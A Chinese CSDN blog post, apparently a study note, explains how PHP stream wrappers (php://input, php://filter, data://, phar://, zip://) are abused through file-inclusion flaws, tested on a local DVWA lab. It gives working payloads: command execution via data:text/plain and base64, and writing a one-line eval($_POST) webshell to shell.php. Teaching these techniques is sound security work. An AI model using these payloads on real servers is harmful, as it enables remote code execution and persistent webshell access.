PHP伪协议

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量2.7k 收藏 20
点赞数 2
分类专栏: web安全 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liwenqianye/article/details/122063190
版权

文件包含伪协议

PHP内置了很多URL风格的封装协议,可用于类似fopen()、copy()、file_exists() 和 filesize()的文件系统函数。

常见文件包含函数:
include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file.

常见的伪协议:

php:// — 访问各个输入/输出流(I/O streams)

data:// — 数据(RFC 2397)

file:// — 访问本地文件系统

zlib:// — 压缩流

phar:// — PHP 归档

php://input(接收POST提交过来的值)

利用条件:
  1. allow_url_fopen=on
  2. allow_url_include=on
  3. php版本小于等于5.3.0
利用方式:

执行phpinfo();

img

getshell

img

php://filter

利用条件:
  1. allow_url_fopen=on
  2. allow_url_include没有要求
利用方式:

php://filter/read=convert.base64-encode/resource=./robots.txt

读取目标服务器文件内容,并讲这些内容进行base64编码,我们只需要解码就可以了。

img

data:text/plain

利用条件:
  1. allow_url_fopen=ON
  2. allow_url_include=ON
  3. php版本大于5.2
利用方式:
data:text/plain,<?php phpinfo();?>
data:text/plain,<?php system("whoami");?>
data:text/plain,<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["s"]);?>');?>

who am i 显示的是实际用户的用户名,即用户登陆的时候的用户ID。此命令相当于who -m。

whoami 显示的是有效用户ID,当前“操作用户”的用户名。

fputs(file,string,length)

fputs() 函数将内容写入一个打开的文件中。

函数会在到达指定长度或读到文件末尾(EOF)时(以先到者为准),停止运行。

如果函数成功执行,则返回写入的字节数。如果失败,则返回 FALSE。

fputs() 函数是 fwrite() 函数的别名。

file必需。规定要写入的打开文件。
string必需。规定要写入打开文件的字符串。

实例

<?php $file = fopen("test.txt","w"); echo fputs($file,"Hello World. Testing!"); fclose($file); ?>

输出:21

题目

img

执行命令:

img

getshell:

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=data:text/plain,<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["s"]);?>');?>

img

查看目录,shell写入成功:

img

img

data:text/plain;base64,

利用方式

同data:text/plain,但是需要进行base64编码和url编码。

题目

1,使用了**data:text/plain;base64,**但是没有进行base64加密,所以报错

img

2,进行第一次base64加密之后产生的加号+导致了报错

img

3,对加号进行url进行编码

img

命令执行:

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==

img

phar://

phar://[压缩文件路径]/[压缩文件内的子文件名]

利用条件:

php版本大于等于5.3.0

利用方式:

利用思路:将一句话木马添加到压缩包2.zip中,然后将2.zip上传到目标服务器上。

使用:page=phar://2.zip/2.php

img

file:

利用条件:

对allow_url_fopen和allow_url_include不做要求

利用方式:

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file://E:%5Cphpstudy_pro%5CWWW%5CDVWA%5Cvulnerabilities%5Cfi%5Cshy.txt

img

zip//

zip://[压缩文件路径]#[压缩文件内的子文件名]

利用思路

将一句话木马添加到压缩包1.zip中,然后将1.zip重命名成1.jpg上传到目标服务器上。

利用方式

zip://1.jpg%231.php 执行一句话木马

img

php 执行一句话木马

img

是文倩呀
关注
  • 2
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
php协议.zipphp协议.zip
02-24
PHP协议】是PHP中一种特殊的机制,它允许开发者通过特定的URL格式来访问和操作服务器上的资源,比如文件系统、数据库等。这个概念在PHP的早期版本中较为常见,但出于安全考虑,现代PHP环境中已经对协议的使用...
PHP封装协议之data流
m0_73720136的博客
05-08 810
通过本实验,利用PHP封装协议中的data流,进行代码执行和系统命令执行,也可以对代码进行base64编码,同样可以执行一句话木马,从而Getshell。
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php协议、data协议、file协议)
最新发布
2401_84208172的博客
05-24 1219
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php协议、data协议、file协议),该题考察文件包含漏洞,涉及PHP协议data协议file协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
PHP 协议
m0_56107268的博客
11-08 5616
php协议
php协议
weixin_60719780的博客
01-27 4497
PHP协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
PHP协议详解
Python老吕的博客
03-06 1983
PHP协议PHP自己支持的一种协议与封装协议,简单来说就是PHP定义的一种特殊访问资源的方法。有些协议成功执行需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
php协议概述.pdf
02-24
PHP协议是一种特殊的URL协议,用于在PHP中进行文件操作。它允许在URL中指定文件路径,并通过内置的PHP函数来访问和操作文件内容。
什么是php协议,并举例说明
02-25
PHP协议PHP中一种特殊的机制,它允许开发者在PHP代码中通过特定的字符串格式来访问和处理非标准的数据源,这些数据源可能不是实际的网络协议,而是PHP内部或者自定义的数据接口。PHP协议的使用极大地扩展了PHP...
php协议.pdfphp协议.pdfphp协议.pdf
02-24
php协议php协议.pdfphp协议.pdf
php协议的解释.txt
02-24
php协议
PHP协议相关 -.pdf
02-24
php协议
关于Python、php协议等的100道题
02-24
本文将深入探讨Python和PHP的相关知识点,特别是关于PHP协议的运用。 首先,让我们关注Python。Python以其简洁的语法、强大的标准库和丰富的第三方模块而闻名。它被广泛用于数据分析、机器学习、网络编程以及自动...
PHP 协议大总结.docx
02-24
PHP 协议大总结.docx
信息安全技术:PHP协议.pptx
11-01
【信息安全技术:PHP协议】 在信息安全领域,理解并掌握编程语言中的安全机制至关重要,特别是对于Web开发常用的语言如PHPPHP协议PHP中的一种特殊机制,它允许开发者通过特定的URL格式来访问和操作各种资源...
PHP协议揭秘:开发者的神奇工具箱.txt
02-24
php协议
Php协议 入侵合约
WYJ____的博客
08-07 781
Whois协议?        PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。         有两个比较重要的配置在php.ini中,allow_url_fopen 和a...
php协议常用代码
08-05
常用的PHP协议代码包括: 1. 使用php://input执行PHP代码:这种方法可以通过将PHP代码作为POST数据传递,然后使用php://input协议来执行代码。例如,可以使用以下代码来执行phpinfo()函数并将结果输出到页面上: ``` <?php eval(file_get_contents('php://input')); ?> ``` 2. 使用php://filter读取源码:php://filter协议可以用于读取PHP源码。以下是一个示例代码,可以使用php://filter来读取文件中的PHP源码并输出到页面上: ``` <?php echo file_get_contents('php://filter/read=convert.base64-encode/resource=file.php'); ?> ``` 3. 使用php://filter绕过过滤器:有时候,某些代码会使用过滤器来过滤用户输入,以防止执行危险的操作。但是,可以使用php://filter协议来绕过这些过滤器。以下是一个示例代码,可以使用php://filter来绕过文件写入过滤器,并将内容写入指定文件: ``` <?php $content = '<?php exit; ?>'; $content .= $_POST['txt']; file_put_contents($_POST['filename'], $content); ?> ``` 需要注意的是,协议在一些环境中可能被禁用或限制,因此在编写代码时需要谨慎处理,并遵循安全最佳实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值